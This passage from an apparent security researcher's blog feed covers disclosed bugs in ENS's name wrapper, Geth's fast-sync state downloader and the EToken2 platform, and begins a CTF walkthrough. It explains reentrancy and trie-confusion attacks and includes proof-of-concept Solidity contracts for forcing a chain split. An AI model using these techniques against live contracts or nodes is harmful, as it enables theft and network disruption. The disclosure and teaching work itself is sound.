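	fmt.Println(m.supply) // 1 + 19 (inner call) + 19 (rest of outer loop) = 39
}
```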

ENS Name Wrapper

More recently, Nick Johnson from ENS reached out about taking a look at their work-in-progress name wrapper for the ENS. The name wrapper allows users to tokenize their ENS domains in a new ERC-1155 token which provides support for fine-grained permissions and a more consistent API.

At a high level, in order to wrap an arbitrary ENS domain (more specifically, any domain that isn't a 2LD .eth domain) you must first approve the name wrapper to access your ENS domain. Then you call wrap(bytes,address,uint96,address) which both mints an ERC-1155 token for you and also takes custody of the underlying ENS domain.

Here's the wrap function itself; it's fairly straightforward. First, we call _wrap which does some logic and returns the hashed domain name. Then we ensure that the transaction sender is indeed the owner of the ENS domain before taking custody of the domain. Note that if the sender does not own the underlying ENS domain, then the entire transaction should revert, undoing any changes made in _wrap.

    function wrap(
        bytes calldata name,
        address wrappedOwner,
        uint96 _fuses,
        address resolver
    ) public override {
        bytes32 node = _wrap(name, wrappedOwner, _fuses);
        address owner = ens.owner(node);

        require(
            owner == msg.sender ||
                isApprovedForAll(owner, msg.sender) ||
                ens.isApprovedForAll(owner, msg.sender),
            "NameWrapper: Domain is not owned by the sender"
        );
        ens.setOwner(node, address(this));
        if (resolver != address(0)) {
            ens.setResolver(node, resolver);
        }
    }

Here's the _wrap function itself. Nothing special going on in here.

    function _wrap(
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) private returns (bytes32 node) {
        (bytes32 labelhash, uint256 offset) = name.readLabel(0);
        bytes32 parentNode = name.namehash(offset);

        require(
            parentNode != ETH_NODE,
            "NameWrapper: .eth domains need to use wrapETH2LD()"
        );

        node = _makeNode(parentNode, labelhash);

        _mint(node, name, wrappedOwner, _fuses);
        emit NameWrapped(node, name, wrappedOwner, _fuses);
    }

Unfortunately, it's the _mint function itself where unsuspecting developers may be in for a nasty surprise. The ERC-1155 specification states that when minting a token, the recipient should be consulted for whether they're willing to accept the token. Upon digging into the library code (which is lightly modified from the OpenZeppelin base), we see that this is indeed the case.

    function _mint(
        bytes32 node,
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) internal {
        names[node] = name;

        address oldWrappedOwner = ownerOf(uint256(node));
        if (oldWrappedOwner != address(0)) {
            // burn and unwrap old token of old owner
            _burn(uint256(node));
            emit NameUnwrapped(node, address(0));
        }
        _mint(node, wrappedOwner, _fuses);
    }
    
    function _mint(
        bytes32 node,
        address newOwner,
        uint96 _fuses
    ) internal virtual {
        uint256 tokenId = uint256(node);
        address owner = ownerOf(tokenId);
        require(owner == address(0), "ERC1155: mint of existing token");
        require(newOwner != address(0), "ERC1155: mint to the zero address");
        require(
            newOwner != address(this),
            "ERC1155: newOwner cannot be the NameWrapper contract"
        );
        _setData(tokenId, newOwner, _fuses);
        emit TransferSingle(msg.sender, address(0x0), newOwner, tokenId, 1);
        _doSafeTransferAcceptanceCheck(
            msg.sender,
            address(0),
            newOwner,
            tokenId,
            1,
            ""
        );
    }

But what good does this do for us, exactly? Well, once again we are presented with an unsafe external call that we can use to perform reentrancy. Specifically, notice that during the callback we own the ERC-1155 token representing the ENS domain, but the name wrapper hasn't yet verified that we own the underlying ENS domain itself. This allows us to operate on the ENS domain without actually owning it in the first place. For example, we can ask the name wrapper to unwrap our domain, burning the token we just minted and getting the underlying ENS domain.

    function unwrap(
        bytes32 parentNode,
        bytes32 label,
        address newController
    ) public override onlyTokenOwner(_makeNode(parentNode, label)) {
        require(
            parentNode != ETH_NODE,
            "NameWrapper: .eth names must be unwrapped with unwrapETH2LD()"
        );
        _unwrap(_makeNode(parentNode, label), newController);
    }
    
    function _unwrap(bytes32 node, address newOwner) private {
        require(
            newOwner != address(0x0),
            "NameWrapper: Target owner cannot be 0x0"
        );
        require(
            newOwner != address(this),
            "NameWrapper: Target owner cannot be the NameWrapper contract"
        );
        require(
            !allFusesBurned(node, CANNOT_UNWRAP),
            "NameWrapper: Domain is not unwrappable"
        );

        // burn token and fuse data
        _burn(uint256(node));
        ens.setOwner(node, newOwner);

        emit NameUnwrapped(node, newOwner);
    }

Now that we have the underlying ENS domain, we can do whatever we want with it, such as register new subdomains or set the resolver. When we're done, we just exit the callback. The name wrapper will fetch the current owner of the underlying ENS domain, which is us, and complete the transaction. Just like that, we've taken temporary ownership of any ENS domain the name wrapper is approved for and made arbitrary changes to it.

Conclusion

Code that's surprising may break things in catastrophic ways. In both of these cases, developers who reasonably assumed that the safe class of functions would be (at least as) safe to use instead inadvertently increased their attack surface. As the ERC-721 and ERC-1155 standards become more popular and widespread, it is very likely that this will become an increasingly frequent occurrence. Developers will need to consider the risks of using the safe class of functions and determine how the external call might interact with the code they've written.

]]>
<![CDATA[Booby Trapping the Ethereum Blockchain]]>https://samczsun.com/booby-trapping-the-ethereum-blockchain/60a80b1a2c41740001d6fc2fThu, 27 May 2021 22:54:20 GMT

This is the second in a series of blog posts about bugs I've found in go-ethereum (Geth). If you haven't already, take a look at Part 1 here.

Today's post is about a bug in Geth's state downloader which could be used to trick it into syncing with mainnet incorrectly. If exploited, an attacker could have booby trapped the Ethereum blockchain and triggered a hard fork at will.

Synchronization

Whenever someone wants to run an Ethereum node, they must first synchronize with the network. This means downloading or computing all of the data needed to build a complete picture of the chain state at the latest block. Depending on the needs of the user, some tradeoffs between security and speed can be made, so Geth supported (at the time) two different sync modes: full sync and fast sync.

As the name would suggest, full sync performs a full synchronization of the Ethereum blockchain. This means that Geth will download and validate the proof-of-work seals on every single block. Geth will also execute every single transaction in the block, which allows it to generate the blockchain state locally without needing to trust other nodes. This is more secure but comes with a heavy speed tradeoff, as a full Geth sync may take anywhere from days to weeks to complete.

However, some users may not want to wait weeks for a full sync to complete. Perhaps they have a deadline to meet, or they simply don't think the extra security is worth the wait. For them, Geth offers fast sync: chain data up to a recent block (known as the pivot) is synchronized using a faster approach, with only the few remaining blocks being synchronized using the slower full sync algorithm. In fast sync mode, Geth downloads but does not verify the proof-of-work seal on every block, instead verifying only certain blocks chosen at random. Geth also does not execute any transactions, instead downloading the state trie directly from peers in order to arrive at the final blockchain state.

Of course, Geth doesn't just blindly trust state trie data that peers send back, or a malicious peer could claim that a certain account has much more ether than it actually does. To understand how Geth can tell whether the data it just received is correct or not, we must first understand the Merkle-Patricia trie.

Merkle-Patricia Trie

The Merkle-Patricia trie (MPT) is a key data structure in Geth and is a combination of the Merkle tree and the Patricia trie.

Put very simply, a Patricia trie stores data in a tree-like structure based on the data's prefix. This is a more optimal way of storing similar data when compared to something like a hashmap, although there may be a speed tradeoff. For example, here's how several words all starting with r might be stored in a Patricia trie.

[Image: a Patricia trie storing words beginning with "r" - by Claudio Rocchini, own work, CC BY 2.5, https://commons.wikimedia.org/w/index.php?curid=2118795]

Meanwhile, a Merkle tree is simply a tree where the leaf nodes are hashes of the data and all other nodes are hashes of their children. If a user knows the Merkle root (i.e. the top hash) of the Merkle tree and wants to check whether a specific piece of data was contained in the tree, they can do so using only a path through the tree, which is proportional to the log of the number of leaf nodes, rather than the number of leaf nodes itself. In the diagram below, a user can prove that L2 is a member of the tree by providing Hash 0-0 and Hash 1. The verifier will then generate Hash 0-1, Hash 0, and Top Hash which can be compared with the Merkle root they expected.

[Image: a Merkle tree with leaves L1-L4 - by Azaghal, own work, CC0, https://commons.wikimedia.org/w/index.php?curid=18157888]

With a MPT, the prefix-based storage layout of the Patricia trie is combined with the Merkle tree to create a data structure whose contents can be cryptographically verified while still maintaining good runtime performance.

In the MPT, keys and values are arbitrary byte strings. To retrieve the value for a key, the key is first converted into a sequence of hexadecimal characters such that every byte becomes two hex characters. Then, the root node is consulted to determine what the next node should be for the first character in the sequence. The child node is then consulted for the second character, and the process repeats until the final node is found for the final character in the sequence.

In the example below, we see there are actually three different types of nodes in the MPT. An extension node (or, a short node, as it's referred to in the Geth codebase) is an optimization which states that the given node is responsible for multiple characters in the stream. In this case, the root node covers all keys which begin with a7, removing the need for two distinct nodes to represent a and 7. A branch node (or a full node) contains pointers for every possible character as well as one extra slot for the value at the current node. Finally, a leaf node (or a value node) indicates that the given node must match until the end of the key.[1]

[Image: the three types of MPT nodes (extension, branch, leaf) - by Lee Thomas]

State Trie

Now that we know how the Merkle-Patricia trie works, we can examine the global state trie itself.

The global state trie is where most of the data for the blockchain is stored. Although it's convenient to imagine the state trie as a distinct entity that is unique to each block, the reality is that duplicating the entire state trie for each block would be extremely inefficient as only a small percentage of the trie changes from block to block. Instead, Geth maintains what can be imagined like a pool of MPT nodes. The state trie for each block is simply a subset of the whole pool, and as new blocks are mined or imported, new MPT nodes are inserted into the pool.

In order to identify the root nodes in the pool of nodes, the block header must be consulted. Every block contains a field known as the stateRoot, which points to the root node of the MPT which stores account data keyed by the account address.[2] This allows Geth to look up account information such as the nonce or balance for any address using the algorithm we described above.

[Image: the block header's stateRoot pointing into the global state trie - original by Lee Thomas]

Note that for contracts, the account state will contain a non-empty storageRoot and codeHash. The storageRoot points to another root node, but this time for a MPT which stores contract storage data. This MPT is keyed on the storage slot and the value is the raw data itself.

[Image: a contract's storageRoot pointing to its own storage trie - original by Lee Thomas]

To store the MPT on disk, Geth chose to use LevelDB as its database. However, LevelDB is a key-value datastore that only supports string-to-string mappings, and a MPT is not a string-to-string mapping. To solve this problem, Geth flattens the global state trie by writing each node as a key-value pair: the key is the hash of the node and the value is the serialized node itself. This is also how Geth is able to look up the state trie for any given block, because the stateRoot field in the block header is the key which can be used to find the serialized MPT node in LevelDB.

Trie Confusion

So let's say that you're starting up a Geth node and you're connecting to the network using fast sync. Geth will quickly download all of the block data but not execute any transactions. Before long, you'll have a chain of blocks but no state information. Here, Geth kicks off the state downloader which begins synchronizing from the pivot block's stateRoot.

// NewSync creates a new trie data download scheduler.
func NewSync(root common.Hash, database ethdb.KeyValueReader, callback LeafCallback, bloom *SyncBloom) *Sync {
	ts := &Sync{
		database: database,
		membatch: newSyncMemBatch(),
		requests: make(map[common.Hash]*request),
		queue:    prque.New(nil),
		bloom:    bloom,
	}
	ts.AddSubTrie(root, 0, common.Hash{}, callback)
	return ts
}
Source

The state downloader will send a request to its peers for the MPT node data corresponding to the MPT node key. When it receives a result, it verifies that the node data hashes to the expected node key. If it does, then the state downloader knows that the node is correct and will process it by dispatching more requests for each child of the node.

		// Create and schedule a request for all the children nodes
		requests, err := s.children(request, node)
		if err != nil {
			return committed, i, err
		}
		if len(requests) == 0 && request.deps == 0 {
			s.commit(request)
			committed = true
			continue
		}
		request.deps += len(requests)
		for _, child := range requests {
			s.schedule(child)
		}
Source

If a leaf node is encountered, that is, a node which contains a serialized account state, then the account's code and state trie will be queued for fetching.

	callback := func(leaf []byte, parent common.Hash) error {
		var obj Account
		if err := rlp.Decode(bytes.NewReader(leaf), &obj); err != nil {
			return err
		}
		syncer.AddSubTrie(obj.Root, 64, parent, nil)
		syncer.AddRawEntry(common.BytesToHash(obj.CodeHash), 64, parent)
		return nil
	}
Source

Note that there's a distinction between synchronizing a sub trie and a raw entry. While both will download an arbitrary blob of data, if the syncer is expecting a sub trie then it will parse the data as a trie node and begin synchronizing its children. On the other hand, if the syncer is expecting a raw entry it will simply write the blob to the database and terminate.

		// If the item was not requested, bail out
		request := s.requests[item.Hash]
		if request == nil {
			return committed, i, ErrNotRequested
		}
		if request.data != nil {
			return committed, i, ErrAlreadyProcessed
		}
		// If the item is a raw entry request, commit directly
		if request.raw {
			request.data = item.Data
			s.commit(request)
			committed = true
			continue
		}
Source

Additionally, note that it's not uncommon for Geth to want to request the same node multiple times. For example, two contracts might share the same stateRoot if they contain identical storage, or two accounts might share the same account state. In this case, Geth doesn't want to spam the network with spurious requests so it will merge them together.

func (s *Sync) schedule(req *request) {
	// If we're already requesting this node, add a new reference and stop
	if old, ok := s.requests[req.hash]; ok {
		old.parents = append(old.parents, req.parents...)
		return
	}
	// Schedule the request for future retrieval
	s.queue.Push(req.hash, int64(req.depth))
	s.requests[req.hash] = req
}
Source

However, the syncer doesn't merge the raw attribute of a request. This means that if there is already a pending raw entry request but the syncer schedules a sub trie request with the same hash, it will be merged and the end result will still be a raw entry request.

Remember that a raw request does not process the node for children to be synced. This means that if we can somehow generate a collision between a raw node and a sub trie node, we'll be able to cause Geth to sync an incomplete state trie. Furthermore, Geth (at the time) didn't bail out when reading from a trie node that doesn't exist, likely assuming that such a situation could never happen if the downloader reported a successful sync. As a result, a Geth node with a missing trie node would behave completely differently from any other node with a fully synchronized trie.
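The flawed merge can be reduced to a few lines. This is a toy model (invented names, not Geth's actual scheduler): requests are deduplicated by hash, but the merge silently keeps the first request's raw flag, so a later sub trie request for the same hash inherits raw-entry treatment and its children are never scheduled.

```go
package main

import "fmt"

// request models a pending download: raw entries are written to the
// database as-is, while sub trie requests are parsed and their children
// scheduled.
type request struct {
	hash string
	raw  bool
}

type scheduler struct {
	pending map[string]*request
}

// schedule mirrors the bug: if a request for this hash already exists, the
// new one is merged into it, and the new request's raw flag is dropped.
func (s *scheduler) schedule(hash string, raw bool) {
	if _, ok := s.pending[hash]; ok {
		return
	}
	s.pending[hash] = &request{hash: hash, raw: raw}
}

func main() {
	s := &scheduler{pending: map[string]*request{}}
	s.schedule("H", true)  // code blob request arrives first (raw)
	s.schedule("H", false) // state root request for the same hash (sub trie)
	fmt.Println(s.pending["H"].raw) // true: still a raw entry, children never fetched
}
```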

So how can we generate such a collision? It turns out to be extremely simple: all we need to do is deploy a contract whose code is equal to the serialized state root of another contract we control. Our code hash will necessarily be the same as the state root hash, which means that if our contract code is synchronized first, our other contract's state trie will never be fully downloaded.

Putting it all Together

Fully weaponizing this vulnerability would have required multiple steps and a lot of waiting.

First, we deploy a contract whose state trie will be overwritten using the exploit. This contract should have a unique stateRoot so that the MPT node associated with that stateRoot won't be synchronized earlier.

contract Discrepancy {
    uint public magic = 1;
    
    // make sure we have a unique stateRoot
    uint[] private filler = [1,2,3,4,5,6,7,8,9,0];
}

Next, we deploy another contract which will use the discrepancy to trigger a hard fork:

contract Hardfork {
    function hardfork(Discrepancy target) public {
        require(target.magic() == 0, "no discrepancy found");
        
        selfdestruct(msg.sender);
    }
}

Finally, we deploy a third contract whose code will be equivalent to the state root of our Discrepancy contract. We must take care here to ensure that the address of this contract is "smaller" than the address of the discrepancy contract itself so that it will always be synced before the discrepancy contract.

contract Exploit {
    constructor(bytes memory stateRoot) public {
        assembly {
            return(add(stateRoot, 0x20), mload(stateRoot))
        }
    }
}

Now we sit back and relax. As new Geth nodes join the network using fast sync, they will request the Exploit contract first, syncing its state sub trie as well as its code. When Exploit's code is synced, it creates a raw request identical to a request for Discrepancy's state root, except it won't be processed as a sub trie request. This means the node will never download Discrepancy's state trie, so future reads of magic will return 0 instead of 1.

After sufficient time has passed, all we need to do is call Hardfork.hardfork(discrepancy). Every node which has correctly synchronized the entire network will see a reverted transaction, while every Geth node which had joined the network using fast sync will see a successful transaction. This will result in two different state roots for that block, meaning that we just triggered a chain split at will.

The Geth team quickly patched this attack by properly handling trie read errors in PR #21039, then fully fixed the vulnerability by distinguishing between code blobs and trie blobs in PR #21080.

Conclusion

This was an extremely interesting bug which gave an attacker the ability to set a booby trap on the Ethereum network and detonate it whenever they liked, causing all fast-synced Geth nodes to fork off mainnet. It relied on extremely complex internal logic within Geth's synchronization and data storage code, which may explain why it went unnoticed for so long.

Tune in later for the third and final (for now, at least) installment in this series, where we'll be exploring a bug in Geth that's so new, the details are still embargoed at the time of writing.


[1] Technically, value nodes in Geth don't contain a suffix. Instead, you can think of it like an extension node followed by a value node (which just contains the raw data).

[2] In reality, Geth uses what it calls a "secure trie", which just hashes all keys using the SHA-3 algorithm in order to ensure all keys are always a fixed length.

]]>
<![CDATA[Uncovering a Four Year Old Bug]]>https://samczsun.com/uncovering-a-four-year-old-bug/6069538c8b092400019ea099Mon, 19 Apr 2021 18:39:44 GMT

Every adventure requires a first step - The Cheshire Cat

What does it take to find a bug? What about one in a contract that's survived the test of time? The journey to a critical vulnerability isn't always straightforward and might begin when you least expect it.

A few weeks ago I tweeted about a critical bug I had found. The bug affected contracts that are over four years old and now manage over a billion dollars in assets. Today, I'll tell you the story of how it happened.

The White Rabbit

It was just after lunch when I got a push notification from one of the Ethereum security group chats.


This immediately caught my attention for two reasons:

  1. Most users of go-ethereum (geth) will normally never run into an error, because the software is written to be extremely resilient
  2. This error was occurring on the latest version of geth, meaning it had all the newest security patches

Having just found a bug in geth myself recently, I couldn't help but wonder if there was an ongoing attack.


Anatol confirmed that the block was indeed on mainnet and shared his log file to help with debugging.

########## BAD BLOCK #########
Chain config: {ChainID: 1 Homestead: 1150000 DAO: 1920000 DAOSupport: true EIP150: 2463000 EIP155: 2675000 EIP158: 2675000 Byzantium: 4370000 Constantinople: 7280000 Petersburg: 7280000 Istanbul: 9069000, Muir Glacier: 9200000, YOLO v2: <nil>, Engine: ethash}

Number: 11805072
Hash: 0x0b3d0081b32c2159e2b77e5f2c798b737d0ae1a822669614c989377947c71ada
     0: cumulative: 123312 gas: 123312 contract: 0x0000000000000000000000000000000000000000 status: 1 tx: 0x9bdf8792e0d6b62a68b9dbd849d60ca78ae6512d9a838d575d4f51d36a7ae095 logs: [0xc12c5d6000 0xc12c5d60b0 0xc12c5d6160 0xc12c5d6210 0xc12c5d62c0] bloom: 00200000000000040000000080000000000000000000001000010001000000000000000000000000000000000000000002000000080800000000000000000000000000000000000000000008000000200000000000000000000000008000010000000000000000000000000000000010000000000000000000000010000000000000000000000000004000000000000000000001000000080000004000000000000000000000000000000000000000000000000000000000000000000000000000008002000082000000000040000000000000000000001002000000000020000000200000000000000000000000000000000000000000400080000000000000 state: 
     [snip]
     203: cumulative: 11152534 gas: 45752 contract: 0x0000000000000000000000000000000000000000 status: 1 tx: 0x63fe497529605f75abdaa5b026ef5e6d878fca827a7ee2a3168d9c4f0347baef logs: [0xc127c05970] bloom: 00000000000000000000000000000000000000000800000000010000000000000000000000000000000000000000000000000800000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000034000000000000000000000000000000000000000000000000000000000000 state: 


Error: invalid gas used (remote: 12458355 local: 11152534)
##############################

This error says that the block header claimed that all of the transactions used a total of 12458355 gas, but when the node executed all of the transactions it only used 11152534 gas instead. I first double-checked that my own node knew of the suspicious block.

$ seth block 11805072 hash
0x0b3d0081b32c2159e2b77e5f2c798b737d0ae1a822669614c989377947c71ada

Given that the block hash matched, I knew that this wasn't an exploit but rather some sort of error with Anatol's node. The error log tells us the gas used by each transaction, so I quickly wrote a script to check each transaction in the block and compare the actual gas used with what Anatol's node reported. This let me pinpoint the offending transaction.
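The comparison itself is trivial once you have the two sets of receipts. Here's a hedged sketch of that script (the real one queried the nodes over RPC; the gas values below are made up for illustration): walk the per-transaction gas usage from both nodes and report the first index where they diverge.

```go
package main

import "fmt"

// firstDivergence returns the index of the first transaction whose gas
// usage differs between the two nodes, or -1 if they agree everywhere.
func firstDivergence(mainnet, local []uint64) int {
	for i := range mainnet {
		if i >= len(local) || mainnet[i] != local[i] {
			return i
		}
	}
	return -1
}

func main() {
	// Illustrative gas-used values, one entry per transaction in the block.
	mainnet := []uint64{123312, 51000, 1351573, 45752}
	local := []uint64{123312, 51000, 45752, 45752}
	fmt.Println(firstDivergence(mainnet, local)) // 2: the offending transaction
}
```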


I knew that there must be some difference in state between Anatol's node and mainnet, so I DMed him for RPC access so that I could inspect the contracts that the offending transaction interacted with.


The transaction in question was a simple ERC20 transfer, so I quickly simulated it on Anatol's node, which failed.


I quickly confirmed that the sending account contained enough tokens so all that was left was to comb through each sub-call to see where the gas usage discrepancy came from. After wrangling with seth for a bit, I found the root cause.


This contract contained an address in storage slot 0 on mainnet but nothing on Anatol's node, a clear indication of storage corruption. Anatol revealed that he had actually restored the geth database from a backup, so most likely something got lost along the way and the node couldn't read the storage entry for that specific contract. Given that it'd be practically impossible to figure out what else was corrupted, I recommended he give snap sync a shot to quickly get his node back up and running.


Down the Rabbit Hole

Now that the immediate mystery was solved, I turned my attention to the corrupted contract. While debugging the transaction, I recognized the contract as an EToken2-issued token. I had reviewed that particular platform a long time ago, but that was before I gained all the experience I have now. Sometimes all it takes is a fresh approach, and I was feeling confident that things would be different this time.

I started by defining my goals. Since this was an ERC20 contract, any way to get free tokens (either through stealing them from others or minting them myself) would have the highest impact. Next would be any form of griefing such as burning tokens that I don't own or making it impossible to transfer tokens.

Now I could start reviewing. The token contract itself delegates the ERC20 functions such as transfer to an implementation contract, but interestingly the implementation may vary per-user. Essentially, the token contains a default implementation (the latest version) which can be upgraded at any time by the owner. If a user doesn't agree with the upgrade, they can choose to opt-out and fix their specific implementation to the current version instead of being dragged along to the new implementation. This was an extremely interesting mechanic but I quickly confirmed that there was no way for me to set a custom implementation for myself, so I moved on.

Next up was the default implementation contract. Because the token wasn't using delegatecall but rather call, it needed to tell the implementation who the original caller was. If the implementation wasn't correctly authenticating the proxy, then it would be possible to spoof a transfer. Unfortunately, a quick check revealed that the implementation contract was secure as well.

After one more hop through the main token contract I finally arrived at the EToken2 platform contract, which is where all of the ERC20 logic is truly implemented. If the previous contracts were the appetizers, then this would be the main course, and I was excited to dig in.

Cake and a Drink

Earlier I had noticed that, in order to be ERC20-compliant, each token contained two functions which emitted Transfer and Approval events and which could only be called by the EToken2 contract. It would be extremely interesting if I could somehow trick the EToken2 contract into emitting fake events, so I focused on this first.

There was only one place in the EToken2 contract which triggered a token to emit the event, and that was in _proxyTransferEvent.

function _proxyTransferEvent(uint _fromId, uint _toId, uint _value, bytes32 _symbol) internal {
    if (proxies[_symbol] != 0x0) {
        // Internal Out Of Gas/Throw: revert this transaction too;
        // Recursive Call: safe, all changes already made.
        Proxy(proxies[_symbol]).emitTransfer(_address(_fromId), _address(_toId), _value);
    }
}

Interestingly though, the function didn't take the proxy address directly; instead, it looked the proxy up by symbol. This was a classic setup for an indirection attack, because if I could change the value of proxies[_symbol] then I would be able to trigger a Transfer event on any target I wanted.

There were three calls to _proxyTransferEvent: minting would trigger an event from address(0) to msg.sender, burning would trigger an event from from to address(0), and transferring would trigger an event from from to to. The first two were not particularly useful because I could only control at most one of the two parameters, but the last was interesting because I could potentially trigger a Transfer event from an arbitrary address to an arbitrary address.

Unfortunately, here I ran into a problem. The only way to reach the _transfer function was through the proxyTransferFromWithReference function, and that function would only allow the address specified in proxies to trigger a transfer for the specific symbol. This meant that if I owned a token and updated my proxy to the proxy for another token, I would no longer be able to trigger the transfer to cause the exploit.

It seemed like this potential exploit was dead, but I was reluctant to give up on it so I scrolled around some more. It was then that I really looked closer at the function signature for _transfer.

function _transfer(
    uint _fromId,
    uint _toId,
    uint _value,
    bytes32 _symbol,
    string _reference,
    uint _senderId
) internal checkSigned(_senderId, 1) returns (bool);

I had completely dismissed the checkSigned modifier because it was obviously a no-op in the default configuration. If it were significant, then users would have to submit some sort of signature with each transfer, and that was obviously not happening. Now, with nowhere else to turn, I decided to look into what exactly checkSigned was doing.

    function _checkSigned(Cosigner _cosigner, uint _holderId, uint _required) internal returns(bool) {
        return _cosigner.consumeOperation(sha3(msg.data, _holderId), _required);
    }

    modifier checkSigned(uint _holderId, uint _required) {
        if (!isCosignerSet(_holderId) || _checkSigned(holders[_holderId].cosigner, _holderId, _required)) {
            _;
        } else {
            _error('Cosigner: access denied');
        }
    }

Incredible! It turns out that checkSigned actually performed an external call if a cosigner was set for the user. This would explain why I never saw any users providing any signatures for a simple transfer. At the same time, this security feature was exactly what I needed to finalize my exploit.

I've talked about how reentrancy is really just a subset of what I've dubbed unsafe external calls, because the real risk is in the fact that control flow is handed to a third-party contract which can then go and do whatever it wants. The attacker could choose to reenter through the same function, but they could just as well do anything else, and this is a great example of that.

The problem I was facing was that I needed proxies[symbol] to be my own proxy before the transfer call, but a different value after I had begun the transfer process. Now with the cosigner functionality, I could set a custom cosigner which would swap my symbol's proxy when it receives a call to consumeOperation. This call would happen after the call to proxyTransferFromWithReference but before the call to _proxyTransferEvent, allowing me to trigger an arbitrary event on any EToken2-issued token!

Pepper

This was a good start, but the impact was not quite what I was looking for. This was because EToken2 is a whitelisted platform and only a centralized authority could issue new tokens. If I were an attacker and I wanted to pull off this attack, I would have to sign up and probably go through KYC/AML, which is obviously not ideal. It was also unclear who exactly might be affected by this bug, and I couldn't really go and test it for myself.

Undeterred, I stowed this finding away and kept looking for something else. While scanning through the contract, I noticed some interesting logic for transferring access from one user to another.

    function grantAccess(address _from, address _to) returns(bool) {
        if (!isCosignerSet(getHolderId(_from))) {
            _error('Cosigner not set');
            return false;
        }
        return _grantAccess(getHolderId(_from), _to);
    }

    function _grantAccess(uint _fromId, address _to) internal checkSigned(_fromId, 2) returns(bool) {
        // Should recover to previously unused address.
        if (getHolderId(_to) != 0) {
            _error('Should recover to new address');
            return false;
        }
        // We take current holder address because it might not equal _from.
        // It is possible to recover from any old holder address, but event should have the current one.
        address from = holders[_fromId].addr;
        holders[_fromId].addr = _to;
        holderIndex[_to] = _fromId;
        // Internal Out Of Gas/Throw: revert this transaction too;
        // Recursive Call: safe, all changes already made.
        eventsHistory.emitRecovery(from, _to, msg.sender);
        return true;
    }

As it happens, I was so engrossed in figuring out how exactly to swap around the proxy that I didn't pay attention to what was actually going on in the contract. Notice that in the signature for _transfer, the from and to values are actually uint, not address. The EToken2 contract maintains a mapping of users (address) to holder id (uint) and this was the logic for granting your holder id to another address.

The moment I realized this, I started studying this function in earnest. At a high level, this function essentially transferred ownership of some data from one entity to another, and one common mistake to make when implementing this sort of internal ownership transfer is to update the receiver correctly but forget to invalidate the sender. If the receiver isn't updated correctly, any sort of testing will instantly reveal that there's a problem. If the sender isn't invalidated correctly, simple tests might not notice anything wrong.

Looking closer at the implementation of _grantAccess, I saw that it was intentionally designed such that it's possible to determine the previous address that owned a specific holder id. This was intended to allow a user who accidentally granted access to the wrong wallet to still maintain ownership, but intuitively I knew something was off here.

Even still, I couldn't quite figure out what that was at first glance. After all, if an attacker were to grant access to their holder id to another user, that's just putting their own funds at risk. Why would anyone want to do that?

After stewing on it for a little bit, I realized that I was looking at it in the wrong way. The key was that while the other user would have full ownership over "my" holder id, I would also have full ownership over "their" holder id. In other words, I would be able to backdoor any new user of the EToken2 platform and gain full access to their account, which translates to control over any EToken2-issued token they owned.

It was a quick step from there to figure out how to weaponize this exploit. I needed to grant access to a user before they first use the EToken2 platform, but I can't just go around granting access to random addresses. The solution was clear - I could just scan the mempool for transactions which would result in a user becoming registered with the EToken2 platform, and then frontrun any transactions I find. What's more, because of EToken2's architecture, I wouldn't just be attacking a single token but multiple tokens with multi-million dollar market caps.

At this point, I knew I had found what I was looking for, and it was time to contact the project.

52

Finding the bug was one thing, but fixing it was another. EToken2 had been designed to be non-upgradable, but forcing every single token issued on top of EToken2 to migrate their data to a new contract would be unduly burdensome. Oleksii, a fellow white hat and the head architect at Ambisafe, agreed. We had to find another way.

There weren't many things in _grantAccess that could revert. In fact, there was only one: the very last line in the function logged an event using the eventsHistory contract. If this call reverted, then so would the call to _grantAccess, and it would be impossible for anyone to backdoor another account. However, the EventsHistory contract didn't allow administrators to redefine the handler for an event.

    function addVersion(address _caller, string _name, string _changelog) noValue() checkAccess("admin") returns(bool) {
        if (versions[_caller] != 0) {
            return false;
        }
        if (bytes(_name).length == 0) {
            return false;
        }
        if (bytes(_changelog).length == 0) {
            return false;
        }
        uint version = ++latestVersion;
        versions[_caller] = version;
        versionInfo[version] = VersionInfo(block.number, msg.sender, _caller, _name, _changelog);
        return true;
    }

    function () noValue() {
        if (versions[msg.sender] == 0) {
            return;
        }
        // Internal Out Of Gas/Throw: revert this transaction too;
        // Call Stack Depth Limit reached: revert this transaction too;
        // Recursive Call: safe, all changes already made.
        if (!emitters[msg.sig].delegatecall(msg.data)) {
            throw;
        }
    }

It seemed like we were at a dead end, but we quickly realized the situation wasn't nearly as bad as it appeared. Although the EventsHistory contract was intended to be immutable, it too had a bug which could be "exploited" by the admins.

Each emitter was handled using a delegatecall, which causes the code to be executed with the current contract's context. If we wanted to perform an upgrade on the EventsHistory contract, we could just register a fake emitter which would perform the upgrades we wanted by directly writing to storage.

Oleksii quickly wrote a few contracts to patch up the vulnerabilities I had found. The first would replace the handler for the emitRecovery function and would require that any addresses being granted access had explicitly opted in to being granted access. The second would replace the handler for all ERC20-related events and would require that the proxy contract for a given symbol was the expected proxy. The third would perform the upgrade on the EventsHistory contract by replacing the handlers and then forever disable the ability to register new emitters, making the contract truly immutable.

On April 6th, a mere 4 days after I had taken that first step, the upgrades were deployed and this saga was forever immortalized on the blockchain.


Special thanks to Anatol for the very special role he played in this and Oleksii for sacrificing his weekend in order to resolve this with me.

]]>
<![CDATA[Paradigm CTF 2021 - swap]]>https://samczsun.com/paradigm-ctf-2021-swap/606dfaa58b092400019ea0b3Fri, 09 Apr 2021 17:17:56 GMT

When you have eliminated all which is impossible, then whatever remains, however improbable, must be the truth - Sherlock Holmes

Paradigm CTF 2021 took place in early February and together, players solved all but two of the challenges during the competition (and one of the remaining two mere days later).

However, the second of the two remained unsolved for almost 2 months until just a few days ago.

Today, we'll be taking a look at swap in the form of a guided walkthrough. Each section will give you a small hint at the end in case you're stuck. If you haven't already, take a look at the challenge files here and familiarize yourself with the code.

The Challenge

This challenge implements a fictional stablecoin AMM. Users can do all the things you'd expect from an AMM: swap assets and mint/burn/transfer LP shares. The contract is initialized with 100 ether worth of four stablecoins (DAI, TUSD, USDC, USDT) and the win condition is to reduce the TVL of the AMM to 1% of what it started with.

Initially, you might assume that there's a bug in the swap function, but it's easy to confirm with reasonable confidence that the function behaves as expected and won't give you any free stablecoins.

You might also try stealing the LP tokens from the setup contract itself, but the ERC20 implementation appears to be correct and so that's impossible too.

